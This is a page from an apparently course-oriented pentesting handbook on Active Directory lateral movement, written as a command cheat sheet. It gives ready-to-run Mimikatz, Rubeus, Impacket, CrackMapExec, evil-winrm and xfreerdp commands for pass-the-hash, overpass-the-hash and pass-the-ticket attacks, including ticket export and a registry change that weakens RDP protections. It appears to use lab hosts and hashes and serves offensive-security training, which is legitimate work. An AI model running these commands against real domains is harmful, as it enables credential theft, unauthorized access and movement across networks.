Pentest-Book
  • Pentest-Book
  • Recon
    • Public info gathering
    • Root domains
    • Subdomain Enum
      • Subdomain Takeover
    • Webs recon
    • Network Scanning
    • Host Scanning
    • Packet Scanning
  • Enumeration
    • Pentesting Web checklist
      • Cheat sheet
    • Pentesting Web Checklist V2
    • Web Attacks
      • General Info
      • Quick tricks
      • Bruteforcing / Cracking
      • Crawl / Fuzz
      • Header injections
      • LFI / RFI
      • Open redirects
      • SSRF
      • SQLi
      • File upload
      • XSS
        • CSP
      • XXE
      • CORS
      • CSRF
      • Command Injection
      • HTTP Request Smuggling
      • Web Cache Poisoning
      • Clickjacking
      • Web Sockets
      • CRLF
      • IDOR
      • Session fixation
      • Email attacks
      • HTTP Parameter pollution
      • SSTI
      • Deserialization
      • Prototype Pollution
      • JWT attacks
      • Webshells
      • Broken Links
      • Cookie Padding
      • Information Disclosure
    • Web Technologies
      • Wordpress
      • Joomla
      • Drupal
      • Tomcat
      • APIs
      • GraphQL API
      • JS
      • ASP.NET
      • GitHub / GitLab
      • WAFs
      • Firebird
      • WebDav
      • Jenkins
      • IIS
      • VHosts
      • Firebase
      • OWA
      • OAuth
      • Flask
      • Symfony && Twig
      • NoSQL (MongoDB, CouchDB)
      • PHP
      • RoR (Ruby on Rails)
      • JBoss - Java Deserialization
      • OneLogin - SAML Login
      • Flash SWF
      • Nginx
      • Python
      • Adobe AEM
      • Magento
      • SAP
      • MFA
      • GWT
      • Jira
      • OIDC (Open ID Connect)
      • ELK
      • Sharepoint
      • Others
    • Cloud
      • General
      • Cloud Info Gathering
      • AWS
      • Azure
      • GCP
      • Docker && Kubernetes
      • CDN - Comain Fronting
    • Files
    • SSL/TLS
    • Ports
  • Exploitation
    • Payloads
    • Reverse Shells
    • File transfer
  • Post Exploitation
    • Linux
    • Pivoting
    • Windows
      • AD
        • Kerberos
      • PS tips & tricks
  • Mobile
    • General
    • Android
    • iOS
  • Others
    • Burp Suite
    • Password cracking
    • VirtualBox
    • Code review
    • Internal Pentest
    • Web fuzzers review
    • Recon suites review
    • Subdomain tools review
    • Random
    • Master assessment mindmaps
    • Bug Bounty
    • Exploiting
    • Tools everywhere
  • EXTERNAL PENTEST PLAYBOOK
    • Attack Strategy
    • Information Gathering OSINT
    • Attacking Login Portals
    • Common Pentest Findings
  • Courses
    • Practical Ethical Hacking
      • Information Gathering
    • Open-Source Intelligence (OSINT)
      • Sock Puppets
      • Email OSINT
      • Password OSINT
      • Image OSINT
      • Username OSINT
      • People OSINT
      • Social Media OSINT
      • Website OSINT
      • Business OSINT
      • Wireless OSINT
      • Working with OSINT Tools
      • OSINT Automation Foundations
      • OSINT Flowcharts
      • Search Engine OSINT
    • OSCP
      • Command Line Fun
      • Practical Tools
      • Bash Scripting
    • CBBH
    • CPTS
      • Penetration Testing Process
      • Getting Started
      • Network Enumeration with Nmap
      • Protocols & Services
        • MSSQL
      • File Transfers
      • Shells & Payloads
      • Metasploit Framework
      • Password Attacks
      • Active Directory
  • Internal Pentest
    • Internal Pentest CheatSheet
Powered by GitBook
On this page
  • Lateral Movement
  • Pass the Hash (PtH)
  • Pass the Key / OverPass the Hash
  • Pass the Ticket (PtT)
  1. Courses
  2. CPTS

Active Directory

Lateral Movement

Pass the Hash (PtH)

# Pass the Hash from Windows Using Mimikatz:
mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:<domain> /run:cmd.exe" exit

# Pass the Hash with PowerShell Invoke-TheHash (Windows)
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <user> -Hash <hash> -Command "whoami" -Verbose

# Pass the Hash with Impacket (Linux) / impacket-wmiexec impacket-atexec impacket-smbexec
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

# Pass the Hash with CrackMapExec (Linux)
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami

# Pass the Hash with evil-winrm (Linux)
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

# Enable Restricted Admin Mode to Allow PtH with RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
# Pass the Hash with RDP (Linux)
xfreerdp  /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B

Pass the Key / OverPass the Hash

# Mimikatz - Extract Kerberos Keys
sekurlsa::ekeys

# Mimikatz - Pass the Key/OverPass the Hash
sekurlsa::pth /domain:domain.htb /user:user /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f

# Rubeus - Pass the Key/OverPass the Hash
Rubeus.exe asktgt /domain:domain.htb /user:user /aes256:b21c99f..SNIP..da3fe60 /nowrap

Pass the Ticket (PtT)

# Mimikatz - Export Tickets
sekurlsa::tickets /export

# Rubeus - Export Tickets
Rubeus.exe dump /nowrap

# Rubeus Pass the Ticket
Rubeus.exe asktgt /domain:domain.htb /user:user /rc4:3f74a71..SNIP..2f077b1ce50f /ptt
# Another way is to import the ticket into the current session using the .kirbi
Rubeus.exe ptt /ticket:RND-user@krbtgt-domain.htb.kirbi
# Convert .kirbi to Base64 Format
[Convert]::ToBase64String([IO.File]::ReadAllBytes("RND-user@krbtgt-domain.htb.kirbi"))
# Pass the Ticket - Base64 Format
Rubeus.exe ptt /ticket:doIE1jCCBNKgAwIBBaEDAgEWooID+TCCA/VhggPxMIzSrk/gHuER2XRLdV/<SNIP>

# Mimikatz - Pass the Ticket
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
dir \\DC01.inlanefreight.htb\c$

# Mimikatz - PowerShell Remoting - Pass the Ticket
kerberos::ptt "C:\path\Mimikatz\RND-user@krbtgt-domain.htb.kirbi"
exit
powershell
Enter-PSSession -ComputerName DC01

PreviousPassword AttacksNextInternal Pentest CheatSheet

Last updated 15 days ago